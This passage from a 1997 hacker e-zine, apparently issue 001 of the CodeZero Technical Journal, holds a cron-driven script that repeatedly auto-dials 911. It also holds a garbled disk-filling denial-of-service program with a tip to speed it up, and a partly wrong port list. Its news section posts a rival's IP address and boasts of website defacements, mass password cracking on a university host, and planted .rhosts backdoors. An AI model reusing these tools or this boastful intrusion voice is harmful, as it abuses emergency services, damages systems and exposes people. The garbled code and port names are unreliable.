  1496. # add this line to root's crontab with: crontab -e root
  1497. # 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh
  1498.  
  1499. # note: this assumes the modem device is: /dev/modem
  1500. # if it is otherwise change "port modem" to
  1501. # "port cua1" or whatever the modem device is 
  1502. # although it is usally /dev/modem.
  1503.  
  1504. echo "   get $local 0.0.0.0" >> /tmp/911.dip
  1505. echo "   get $remote 0.0.0.0" >> /tmp/911.dip
  1506. echo "   port modem" >> /tmp/911.dip
  1507. echo "   speed 38400" >> /tmp/911.dip
  1508. echo "   reset" >> /tmp/911.dip
  1509.  
  1510. echo "   send ATQ0V1E1X4\r" >> /tmp/911.dip
  1511. echo "   wait OK 2" >> /tmp/911.dip
  1512. echo "   dial 911" >> /tmp/911.dip
  1513.  
  1514. ps 
  1515.  
  1516. grep "^root" /tmp/ppp-check > /dev/null 2>&1
  1517. if [ $? -ne 0 ] ; then
  1518.         echo "PPP IS DEAD" > /tmp/ppp-dead 
  1519. fi
  1520.  
  1521. if [ -f /tmp/ppp-dead ]; then
  1522.      /sbin/dip /tmp/911
  1523.      rm /tmp/ppp-*
  1524.      rm /tmp/911.dip
  1525.      exit 1
  1526. fi
  1527.  
  1528. kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS="  ";OFS=" "} {print $1}`
  1529. /sbin/dip /tmp/911
  1530. rm /tmp/ppp-*
  1531. rm /tmp/911.dip
  1532. exit 1
  1533.  
  1534. ───────────────────────────────────────────────────────────────────────────────
  1535.   9. Common Ports List : Tetsu Khan
  1536. ───────────────────────────────────────────────────────────────────────────────
  1537.  
  1538.   Program / Name         Port
  1539. ────────────────────────────────
  1540.   kerberos               750
  1541.   montior                561
  1542.   rmontior               560
  1543.   netwall                533
  1544.   ntalk                  518
  1545.   ktalk                  517
  1546.   pkill                  515
  1547.   login                  513
  1548.   execk                  512
  1549.   newsk                  144
  1550.   nntp                   119
  1551.   link                    87
  1552.   chargen                 19
  1553.   bootp                   67
  1554.   rlp                     39
  1555.   netstat                 15
  1556.   discard                  9
  1557.   telnetd                 23
  1558.   ftp                     21
  1559.   smtp                    25
  1560.   pop3                   110
  1561.   identd                 113
  1562.   fingerk                 79
  1563.   http                    80 / 8080
  1564.   military http           80 / 8080 / 5580
  1565.  
  1566. ───────────────────────────────────────────────────────────────────────────────
  1567.   10.Denial Of Service (DOS) Attack 001 : hddkill.c : Testu Khan
  1568. ───────────────────────────────────────────────────────────────────────────────
  1569.  
  1570. This program below, called hddkill.c, does what the name, says, fills up
  1571. the hard drive of the target, this will work well if the target is up 24/7
  1572. as the file that the program creates is alwastings or whereis or find, after a while the hard drive will be
  1573. full and none of the users will be able to write to it until the program is
  1574. deleted.
  1575.  
  1576. filename: hddkill.c
  1577.  
  1578.        #include <stdio.h>
  1579.        #include <stdlib.h>
  1580.  
  1581.        main()
  1582.        {
  1583.              int ifd;
  1584.              chat buf[8192];
  1585.              ifd= open("./attack", O_WRITE| O_CREAT, 0777);
  1586.              unlink("/.attack");
  1587.              while(1)
  1588.                     write(ifd,buf, sizeof9buf));
  1589.        }
  1590.  
  1591.  
  1592. One way to get this to work faster, is to add a fork() call in the program,
  1593. thus making it run multiple copies, and filling up the drive faster.
  1594.  
  1595. ───────────────────────────────────────────────────────────────────────────────
  1596.   11.CodeZero World News : Mr.fr1day
  1597. ───────────────────────────────────────────────────────────────────────────────
  1598.   ELH think they have Death Veggie as vice!
  1599.   -----------------------------------------
  1600. New group on the scene called ELH (Elite Hack Legion), they have around 5
  1601. members, LordNemesis, VooDooHex and some others, including a 'wannabe' by
  1602. the name of DeathVege...
  1603. I was first told of this by my friend Zophar, who had joined ELH so he could
  1604. hook up with DeathVege and then the cDc...
  1605. So my colleague so1o hunted DeathVege down, and logged this...
  1606.  
  1607. Session Start: Sat Mar 08 20:53:43 1997
  1608. * Logging Chat with DeathVege to: [DeathVege.log]
  1609. <so1o> hey man
  1610. <DeathVege> hi
  1611. <so1o> can i ask you a few questions?
  1612. <DeathVege> shure.
  1613. <so1o> can you tell me who the owner of the L0phT is?
  1614. <so1o> hello?!
  1615. <so1o> yew there?
  1616. <DeathVege> Why?
  1617. <so1o> simple question
  1618. <DeathVege> I dunno,
  1619. <DeathVege> Ask Lord Nemesis.
  1620. <so1o> "is this the real deth veggie" test
  1621. <so1o> thats all
  1622. <DeathVege> No I am his student.
  1623. <so1o> okay
  1624. <so1o> define bash
  1625. <DeathVege> In html or script or jarggon?
  1626. <so1o> posix
  1627. <DeathVege> I don't work in posix
  1628. <so1o> really/
  1629. <so1o> what do ?
  1630. <DeathVege> hold on.
  1631. <so1o> okie
  1632. <so1o> tell me what port sendmail uses
  1633. <so1o> tell me what tcp/ip stands for
  1634. <DeathVege> You ask too many questions.
  1635. <so1o> why?
  1636. <so1o> your not lame are you?
  1637. <so1o> like the rest of elh
  1638. <so1o> ?
  1639. -> [DeathVege] VERSION
  1640. <DeathVege> SO you think ELH members are lame?
  1641. <so1o> define bash
  1642. <so1o> that is A SIMPLE question
  1643. <DeathVege> answer me.
  1644. <so1o> that a r you
  1645. <DeathVege> no you answer me now.
  1646. <so1o> no
  1647. <so1o> you answer me now
  1648. <so1o> imposter
  1649. <so1o> im gonna mail veggie
  1650. <so1o> and give him your ip, and this log
  1651. <so1o> lame fuck
  1652. Session Close: Sat Mar 08 21:01:29 1997
  1653.  
  1654. DeathVege's Lameass username / ip :
  1655.  
  1656. ~Jeff@user-168-121-28-31.dialup.mindspring.com
  1657.  
  1658. You can view the ELH (Extremely Lame Hackers) website at :
  1659.  
  1660. http://www.ilf.net/elh/
  1661. ───────────────────────────────────────────────────────────────────────────────
  1662.   -=x9=- and ELH and CyberToast To Merge!
  1663.   ---------------------------------------
  1664. Extemely Lame Hackers, -=x9=- (too much like 9x methinks) and CyberToast
  1665. are in the process of merging, i d0nut gn0 why, cos they're all lamers, and
  1666. they have no clues, if you see them, ask them what sendmail is :D
  1667.  
  1668. So now they hang on irc.dal.net at #-=hex=- and they are fun to laugh at.
  1669.  
  1670. http://www.ilf.net/cybertoast/
  1671. http://www.ilf.net/-=x9=-/
  1672. http://www.ilf.net/elh/
  1673. ───────────────────────────────────────────────────────────────────────────────
  1674.   Zophar and od^phreak hack ELH and CyberToasts websites :)
  1675.   ---------------------------------------------------------
  1676. After realising how lame ELH really are, Zophar decided to give them a little
  1677. pay back, and so himself and od^phreak hacked www.ilf.net and ripped the fuck
  1678. out of ELH and CyberToasts lameass webpages, after all, what comes around
  1679. goes around, those punks had it coming to them...
  1680. ───────────────────────────────────────────────────────────────────────────────
  1681.   CyberKings get arrested.
  1682.   ------------------------
  1683. There are some rumours going around, that members of the secretive group
  1684. known as the CyberKings have been arrested, the CyberKings are based heavily
  1685. around Europe, with some US and Asian links.
  1686. ───────────────────────────────────────────────────────────────────────────────
  1687.   Project.
  1688.   --------
  1689. Deprave, Acid Angel, BroncBuster and a few others are working heavily on a
  1690. big project, more news s00n.
  1691. ───────────────────────────────────────────────────────────────────────────────
  1692.   gitm back for g00d?
  1693.   -------------------
  1694. gitm (Ghost In The Machine), editor of the "Time For A Change" e-zine, has
  1695. been sighted back on the scene, last seen in #hack, will he be back for g00d?
  1696. ───────────────────────────────────────────────────────────────────────────────
  1697.   Warez-Kiddies with bots take #hack.
  1698.   -----------------------------------
  1699. a couple of lame punks with eggbots took over #hack for about 2 hours, the
  1700. lamest fuck was Z|GMA4!zigma4@zigma4.demon.co.uk , if you see him, tell him
  1701. if he ever comes near #hack we will have to kill the demon routers again.
  1702. ───────────────────────────────────────────────────────────────────────────────
  1703.   Digital Darkness BBS Down F0r G00d?
  1704.   -----------------------------------
  1705. omnicolor, aka The Smiling Bandit wrote :
  1706.  
  1707. Digital Darkness BBS has gone down for good. I was having modem problems,
  1708. and just as I got that fixed, all the files disappeared. The directory tree
  1709. was still there, but all the files that run the board were deleted. I tried
  1710. undelete, but there were too many files, and I was supposed to remember the
  1711. first letter of every file. So I just got rid of the whole thing. I'll be
  1712. putting a new one up eventually, maybe after I go to college.
  1713. ───────────────────────────────────────────────────────────────────────────────
  1714.   AWOL News.
  1715.   ----------
  1716. AWOL, the [A]nnihialation of [W]indoze [O]perators [L]td. Based in the UK,
  1717. Now has a 4 storey, 200 roomed building, p-150 / 32mb ram / 1.4gb / 33.6
  1718. laptop (with added biohazard sticker), 2 phone lines, and a bigger system
  1719. on the way, Member List :
  1720.  
  1721. Wild_fiRe       -  phreaker, set up all the fone lines
  1722. BoMbJaCk        -  general systems specialist
  1723. Tokyo_Joe       -  Solaris specialist
  1724. Jester          -  phreaker.
  1725. Grandpa         -  electronics expert, builds boxes etc.
  1726. ───────────────────────────────────────────────────────────────────────────────
  1727. Solaris 2.6 source coming this way s00n.
  1728. ----------------------------------------
  1729. so1o, WayHigh, Fiji, mstrhelix, Sciri and TRON and a few others will have the
  1730. solaris 2.6 source soon, and so expect 2.6 e───────────────────────────────────────────────────────────────────────────
  1731. Who owns altair.herts.ac.uk ?
  1732. -----------------------------
  1733. so1o and TheCa have been basically giving away altair.herts.ac.uk shells for
  1734. altair.herts.ac.uk , due to the slowness and 250kb quotas enforced, these
  1735. shells are basically useless, unless you have root access :)
  1736. There are 10,000 users on the altair /etc/passwd , but l/p's are not global
  1737. like for sirius.herts.ac.uk, anyway, so1o claims to have cracked a good 400
  1738. of them, and TheCa changed the /etc/motd so it said some shit about him
  1739. owning it etc. etc.
  1740. I now estimate that every shells trader that uses IRC has an altair.herts.ac.uk
  1741. shell, and altair has a compiler, so I imagine quite a few people 'own' it.
  1742. ───────────────────────────────────────────────────────────────────────────────
  1743. so1o kills lameass haqr.
  1744. ------------------------
  1745. casino.cchs.usyd.edu.au was to be the battle ground, another hacker had messed
  1746. with so1o and cracked one of the 50 accounts (so1o has passwds for all 50 bar
  1747. root/sysdiag/sundiag, which always changes) then logged in, changed the passwd
  1748. and started to d/l an eggbot onto the system thru ftp (ps -a showed this), so1o
  1749. could not login thru telnet and kill this user, who was not masking or anything
  1750. and seemed quite clueless, so he remembered that although he had no super user
  1751. accounts, he placed .rhosts in ALL the users accounts he ever logged onto, so
  1752. so1o exited...
  1753. -------------------------------------------------------------------------------
  1754. $ rsh -l FOwww casino.cchs.usyd.edu.au csh -i
  1755. no control to this tty blah blah blah...
  1756. % who
  1757. FOwww   tty1   (ad134-43.compuserve.com)
  1758. %write FOwww tty1
  1759. EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me!
  1760. EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me!
  1761. EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me!
  1762. EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me!
  1763. ^C
  1764. % ps -x
  1765. PID    TTY    NOTES(?)
  1766. ----------------------
  1767. 8144    1     ftp ftp.cdrom.com
  1768. 8132    1     -bash
  1769. % write FOwww ttkill -9 8132
  1770. % who
  1771. %
  1772. % so1o wins, fatality...
  1773. so1o : command not found.
  1774. % exit
  1775.  
  1776. Logout
  1777.  
  1778. Connection Closed.
  1779.  
  1780. $
  1781. -------------------------------------------------------------------------------
  1782. umm, i suppose thats it now, until next month!
  1783.  
  1784. mr.fr1day
  1785.  
  1786. ───────────────────────────────────────────────────────────────────────────────
  1787.   12.News Conclusion : Tetsu Khan
  1788. ───────────────────────────────────────────────────────────────────────────────
  1789. Well, ELH and -=x9=- and CyberToast are a bunch of lame fucks, DeathVege at
  1790. ELH needs a good kicking, Zophar and od^phreak gave them a good beating by
  1791. taking their lameass webistes out, just keep up the good work!
  1792.  
  1793. oh yeah, one last thing, goto http://ilf.net/hemp/ and d/l a copy of KRACK
  1794. then read it and try to guess the ages of the authors :D
  1795.  
  1796.   T_K
  1797. ───────────────────────────────────────────────────────────────────────────────
  1798.  
  1799.    ╒══════════════════════════════════════════════════════════════════╕
  1800.    │   The CodeZero Technical Journal, March 1997, Issue 001          │▒
  1801.    └──────────────────────────────────────────────────────────────────┘▒
  1802.     ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
  1803.  
  1804. ───────────────────────────────────────────────────────────────────────────────
  1805.  
  1806.   "I'm The FireStarter, Twisted FireStarter!"
  1807.  
  1808.   Tetsu Khan, CodeZero.
  1809.  
  1810. ───────────────────────────────────────────────────────────────────────────────
  1811.  
  1812.